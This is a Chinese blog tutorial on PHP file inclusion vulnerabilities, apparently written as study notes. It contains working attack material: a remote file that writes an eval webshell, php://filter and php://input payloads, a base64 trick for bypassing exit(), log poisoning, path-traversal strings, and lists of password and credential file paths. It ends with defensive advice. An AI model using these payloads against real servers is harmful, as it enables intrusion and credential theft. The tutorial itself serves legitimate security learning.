文件包含漏洞学习

最新推荐文章于 2023-07-07 15:20:04 发布
最新推荐文章于 2023-07-07 15:20:04 发布
阅读量680 收藏 2
点赞数 3
分类专栏: web安全基础 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49821579/article/details/117390354
版权

1、概述

什么是文件包含?

将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。

漏洞产生原因

文件包含函数加载的参数没有经过过滤或严格定义,可以被用户控制,包含其他恶意文件,导致了执行非预期代码。

示例:

<?php
$filename=$_GET['filename'];
include($filename);
?>

可以看出,改变URL中filename的值即可改变代码中包含的文件。

PHP中的文件包含函数

  • include 函数出现错误时,会抛出警告,但程序仍继续执行。
  • include_once 同 include ,但仅包含一次(避免函数重定义,变量重新赋值等问题)。
  • require 函数出现错误时,会直接报错并退出程序执行。
  • require_once 同 require ,但仅包含一次。

2、类型

2.1、本地文件包含

被包含的文件在服务器本地

包含本地敏感文件

image-20210527204155548

敏感文件默认路径列举(以下目录随系统版本不同而有差异):

  • windows系统:

    C:\windows\win.ini //基本系统配置文件

    C:\boot.ini //查看系统版本

    C:\windows\system32\inetsrv\MetaBase.xml //iis配置文件

    C:\windows\repair\same //存储windows系统初次安装密码

    C:\ProgramFiles\mysql\my.ini //mysql配置信息

    C:\ProgramFiles\mysql\data\mysql\user.MYD //mysql root密码

    C:\windows\php.ini //php配置信息

  • linux/unix系统:

    /etc/passwd //账户信息
    /etc/shadow //账户密码文件
    /usr/local/app/apache2/conf/httpd.conf //Apache2默认配置文件
    /usr/local/app/apache2/conf/extra/httpd-vhost.conf //虚拟网站配置
    /usr/local/app/php5/lib/php.ini //php相关配置
    /etc/httpd/conf/httpd.conf //apache配置信息
    /etc/my.conf //mysql配置文件

包含上传文件

包含文件的内容只要符合php语法都能被当成php代码进行执行,无关后缀名是什么。

image-20210527203723802

2.2、远程文件包含

被包含的文件在远程服务端

条件:php.ini中设置allow_url_fopen = On(默认)、allow_url_include = On ( php5.2后默认为off )

包含远程文件

image-20210527210839912

包含远程shell

remoteshell.txt

<?php
$payload="<?php eval(\$_POST['shell']);?>";
$myfile=fopen('test.php','w') or die("can't open the file!");
fwrite($myfile,$payload);
fclose($myfile);
?>

image-20210527214700058

包含构造好的文件后,会在当前目录下创建test.php,即写入一句话木马,可以对其进行利用,后续也可用菜刀进行连接

image-20210527215840715

image-20210527215247349

3、利用方式

3.1、利用PHP伪协议

何为伪协议?简单的说,就是自己定义的协议,也只有自己的软件支持,其他软件都不识别的协议就是伪协议。

在PHP中,PHP给自己定义了一个php伪协议,以:php://起头。

至于http://file://这些都不是伪协议,都是大部分系统/软件都支持的协议,共享同一套协议标准。

php://filter

php://filter参数

php伪协议的过滤器功能,可以通过拼接各种过滤器达到快速转换字节流的效果。如:

php://filter/read=convert.base64-encode/resource=index.php

其中filter/[read|write]=[过滤器]可简写为filter/[过滤器],php会自选判断是read还是write。

此时php会读取index.php文件的内容,通过convert过滤器的base64-encode方法,最总将所得结果以php代码的形式包含到运行的php文件之中,由于base64编码之后的内容不会出现<?,所以必然不会被识别为php代码,故而能起到文件读取的作用。

image-20210527233338272

对其进行base64解码得到源码

image-20210527233513514

常用的过滤器有:

过滤器名称说明类别版本
string.rot13rot13转换字符串过滤器PHP>4.3.0
string.toupper、string.tolower大小写互转字符串过滤器PHP>5.0.0
string.strip_tags去除<?(.*?)?>的内容string.strip_tagsPHP<7.3.0
convert.base64-encode、convert.base64-decodebase64编码转换转换过滤器PHP>5.0.0
convert.quoted-printable-encode、convert.quoted-printable-decodeURL编码转换转换过滤器PHP>5.0.0
convert.iconv.编码1.编码2任意编码转换转换过滤器PHP>5.0.0
zlib.deflate、zlib.inflatezlib压缩压缩过滤器PHP>5.1.0
bzip2.compress、bzip2.decompresszlib压缩压缩过滤器PHP>5.1.0

利用 php://input 协议

主要用来接收post数据,将post请求中的数据作为php代码执行。

条件:allow_url_include = On(PHP版本>5.2后,默认值为Off)

image-20210527235351691

3.2、file_put_contents

摘自:file_put_content和死亡·杂糅代码之缘

示例:

<?php
$filename=$_GET['filename'];
$content=$_GET['content'];
file_put_contents($filename,'<?php exit();?>'.$content);
?>

$content在开头增加了exit过程,导致即使我们成功写入内容,也执行不了,这时候如何绕过?

image-20210529174557298

payload

filename=php://filter/convert.base64-decode/resource=phpinfo.php&content=aPD9waHAgcGhwaW5mbygpOyA/Pg==

对写入内容(这里是<?php phpinfo(); ?>)进行Base64编码(PD9waHAgcGhwaW5mbygpOyA/Pg==),在包含phpinfo.php这个文件时又进行Base64解码,这时写入内容还原,而死亡代码exit()被解码为乱码,达到绕过目的。

添加额外字符a:Base64解码时是4个byte一组,前面的phpexit一共7个字符,增加一个a凑成8个字符,这样phpexita 被正常解码,而后面我们写入的内容也才会正常解码。

base64编码中只包含64个可打印字符(大小写字母,0-9,+,/),而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。

image-20210529180216634

image-20210529180259106

3.3、其他协议

除了php伪协议外,PHP还支持包含以下协议的数据流:

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

如利用file协议:

image-20210527232103966

3.4、配合日志文件

如果知道服务器日志文件的路径,可在URL请求中添加攻击代码,此代码会被记录在服务器日志文件内,再对日志文件进行包含,攻击代码便会被执行。(前提有访问权限)

测试靶场:DVWA

image-20210527230821426

在日志文件中可见,部分字符被URL编码,代码无法执行,可用burpsuite抓包改回。

image-20210527231123446

image-20210527231156043

利用文件包含漏洞包含此日志文件,即可执行插入代码

image-20210527231313524

4、绕过方式

  • %00截断

条件:magic_quotes_gps=off php版本<5.3.4

示例:

<?php include("inc/" . $_GET['file'] . ".php"); ?>

这里对后缀名进行了限制,可是我们无法上传php文件,满足条件下可用00截断绕过。

?page=…/…/…/…/phpinfo.php%00

  • 长度截断

前提:PHP版本<5.2.10

操作系统对于目录字符串存在长度限制,在linux下4096字节时会达到最大值,在window下是256字节。只要不断的重复./即可:

lfi.php?file=././././[./]+/./shell.txt
lfi.php?file=./shell.txt/.[...]+. # 仅Windows下有效
  • 重写

?page=…//…//…//phpinfo.php

  • 利用php伪协议等

5、危害

最简单的,我们可以通过上传一个包含webshell内容的图片,然后通过包含此图片即可得到一个可以控制的webshell。

  • 获取敏感信息
  • 执行任意命令
  • 获取服务器权限

6、防御

  1. 尽量不使用动态包含,无需情况下设置allow_url_include和allow_url_fopen为关闭;
  2. 对可以包含的文件进行限制︰使用白名单的方式,或者设置包含的目录,open_basedir ;
  3. 严格检查用户输入,参数中不允许出现…/之类的目录跳转符;
  4. 严格检查变量是否初始化;
  5. 不要仅仅在客户端做数据的验证与过滤,关键的过滤步骤在服务端进行。

参考资料:

[1] PHP 本地文件包含(LFI)漏洞学习笔记

[2] file_put_content和死亡·杂糅代码之缘

wawyw~
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
php包含漏洞源码
05-23
PHP包含漏洞是Web应用程序安全领域中的一个重要话题,它涉及到服务器端的编程错误,尤其是当开发者在PHP代码中不正确地处理文件包含时。这个压缩包可能包含了一个用于演示或研究PHP包含漏洞的源码实例。 PHP的文件...
ctfshow文件包含
遇事不决冲冲冲
09-18 3371
web78 无防护读取源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 伪协议读取后base64解密 php://filter/read=convert.base64-encode/resource=flag.php web79 data协议 <?php if(isset($_GET['file
文件包含总结(部分)
zwish的信安之路
07-15 1090
一、文件包含是什么? 文件包含漏洞:即File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 攻击...
文件包含漏洞学习(3)
yzl_007的博客
09-18 479
文件包含漏洞学习(3) 我们看到这一段代码 <?php $filename = $_GET['filename']; include($filename . ".html"); ?> 这里函数后面又添加了.html为后缀,对于有限制的文件包含漏洞,我们可以通过一些方法来绕过,不过也有先决条件:magic_quotes_gpc = Off php版本<5.3.4 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KIyNvIaW-1631894
文件包含漏洞
huangyongkang666的博客
03-21 2504
文件包含漏洞 1.什么是文件包含 ​ 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 2. 文件包含漏洞原理 ​ 文件包含是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数 (include(),require()和include_once(),requir_once()) 利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令
PHP漏洞文件包含漏洞
dogeace的博客
11-28 1797
php语言中存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的时候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的时候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
文件包含渗透从小白到精通
06-23
文件包含渗透是一种常见的网络攻击手段,它主要利用服务器编程语言中的文件包含函数,如PHP中的include()...对于网络安全的学习者来说,理解文件包含漏洞的原理和危害,学习如何防御此类漏洞,同样是非常重要的一部分。
网络安全-实验八-文件上传与文件包含.docx
11-10
总的来说,这个实验涵盖了文件上传和文件包含漏洞的基本利用方法,以及如何防范这些威胁。在实际的网络安全防御中,应对文件上传进行严格的类型检查和内容过滤,避免包含用户可控的文件路径,同时定期进行安全审计和...
CNNVD漏洞资源文件
01-04
这个"CNNVD漏洞资源文件"很可能是一个包含有关安全漏洞详细信息的数据包或代码库,用于研究、学习或者测试网络安全防护措施。 "vul_store-master"作为压缩包子文件的名称,暗示这可能是一个主仓库,存储了多个与...
Web-安全渗透全套教程文件包含漏洞渗透攻击.zip
05-22
综上所述,本套“Web安全渗透全套教程文件包含漏洞渗透攻击”课程将引导学习者了解文件包含漏洞的原理,掌握渗透测试的技巧,以及如何在实际项目中预防这类攻击。通过深入学习和实践,你可以提升自己在Web安全领域的...
超详细文件包含漏洞原理及修复
weixin_53519320的博客
11-17 4043
一、文件包含是什么 程序开发人员通常会把常用的可复性使用的函数写到一个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 (通俗的来说就是把文件放在一个文件夹下面然后使用的时候就可以直接调用) 文件包含原因 文件包含漏洞的原因? 随着网站业务的需求,程序开发人员一般希望代码更加灵活,所以将包含文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含文件时,用户对这个变量可控而且服务端也没有做合理的校验或者校验被绕过就照成了文件包含漏洞
php 远程文件包含配置项,文件包含漏洞总结 - ghtwf01 - Welcome to ghtwf01's blog
weixin_29246195的博客
03-11 541
文件包含简介服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间文件包含函数require()require_once()include()include_once()include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错...
WEB漏洞文件包含漏洞
holen_的博客
01-25 2583
介绍 所谓文件包含漏洞,故名思意,就是在文件中包含(引用)了其他文件所导致的漏洞。例如有些函数在不同代码中的作用都是相同的,在这里我们可以称呼它为“变量”,那么这时程序员就会将该“变量”放在一个文件中,在其他代码中引用该变量文件即可。 当这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 脚本利用 我们先创建一个带有文件包含脚本的PHP文件放在服务器上,代码如下 <?php $filename=$_GET['file
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 8831
文件读取漏洞,文件下载漏洞文件包含漏洞三者结合,靶场练习
31:WEB漏洞-文件操作之文件包含漏洞全解
mingyqf的博客
04-03 2504
31:WEB漏洞-文件操作之文件包含漏洞全解 思维导图 知识点 文件包含漏洞``原理,检测,类型,利用,修复等` `原理:将文件以脚本执行` `文件包含各个脚本代码``ASP,PHP,JSP,ASPXdeng``<!--#``include` `file=``"1.asp"` `-->``<!--#``include` `file=``"1.aspx"` `-->``<c:import url=``"http://thief.one/1.jsp"``>``<jsp
php foreach 过滤条件_php代码审计学习之函数缺陷
weixin_32645173的博客
01-19 2264
原文地址:php代码审计之函数缺陷​syst1m.comin_array函数缺陷Wish ListCodeclass Challenge { const UPLOAD_DIRECTORY = './solutions/'; private $file; private $whitelist; public function __construct($file) { $th...
文件包含漏洞原理
m0_73896875的博客
07-07 82
文件包含漏洞通常由于未充分验证和过滤用户输入而引起。被攻击者通过php代码中include 、include_once 、require 、require_once函数,引入用户输入的指定文件,攻击者可以通过操纵文件包含机制,将恶意文件的内容包含到应用程序的执行环境中。
php中$_GET的一些用法
小狮子
02-01 2144
get:参数都体现在url上,可以用于翻页,简单查询,简单状态判断 举例: 如图,welcome.php?a=1, $_GET["a"]就可以获取a的值,和session有一点像。 其实’?’后面的参数都是可以用 $_GET 获取,各个参数是以’&’作为分隔符的。 ...
命令执行总结
Airwooh的博客
07-21 795
命令执行总结 刚把CTFSHOW的命令执行部分给做完,但脑子里还是混沌一片,想来总结一下这部分,把知识点给凝聚一下,有一个清晰的脉络 首先一个要搞懂一个概念,命令执行是要执行的什么命令? 我认为大致分为两种:php命令和shell命令,一般只执行一种 php代码执行 首先提到一个函数 eval 通过其与$_GET[a] 配合 可以去执行命令 <?php $a=$_GET['a']; eval($a); 翻看php手册 可以看到 官方说明 把字符串 code 作为PHP代码执行。
dvwa靶场文件包含漏洞中级
最新发布
09-12
文件包含漏洞是Web应用程序中的一个常见漏洞,它可以分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。这个漏洞允许攻击者包含并执行服务器上的任意文件。 在...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值